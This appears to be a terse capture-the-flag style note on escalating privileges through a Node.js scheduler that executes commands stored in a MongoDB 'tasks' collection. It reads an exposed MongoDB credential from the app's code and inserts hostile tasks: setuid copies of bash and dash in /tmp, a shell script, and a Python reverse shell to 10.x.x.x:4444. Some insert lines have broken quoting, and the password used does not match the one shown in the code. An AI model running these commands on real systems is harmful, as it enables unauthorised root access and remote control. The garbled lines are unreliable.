ps -ef | grep sched ..running as 'tom'
Found 'mongo' running with localhost:27017
/usr/bin/node /var/www/myplace/app.js ..service running as who?
/usr/bin/node /var/scheduler/app.js
cat /var/scheduler/app.js
cat /var/www/myplace/app.js
const url = 'mongodb://mark:mypassword@localhost:27017/scheduler';
MongoClient.connect(url, function(error, db) {}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});
mongo -u mark -p mypass localhost:27017/scheduler
> show dbs
> use scheduler
> show collections
> db.tasks.find()
> db.tasks.insert({"cmd":"cp /bin/dash /tmp/rootdash; chmod u+s /tmp/rootdash;}
> db.tasks.insert({"cmd":"cp /bin/bash /tmp/tombash; chown tom:admin /tmp/tombash;chmod +s /tmp/tombash"})
> db.tasks.insert({"cmd":"/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } );
> db.tasks.insert({"cmd":"chown tom:admin /tmp/rootdash; chmod 6755 /tmp/rootdash;"}
> db.tasks.insert({"cmd":"bash /tmp/shell.sh" });
> db.tasks.insert({"cmd":"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.x.x.x\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"})
.. sometimes 'bash' will drop the suid bits
.. dash will usually keep them if you set!
/tmp/rootdash -p
whoami ..tom !!
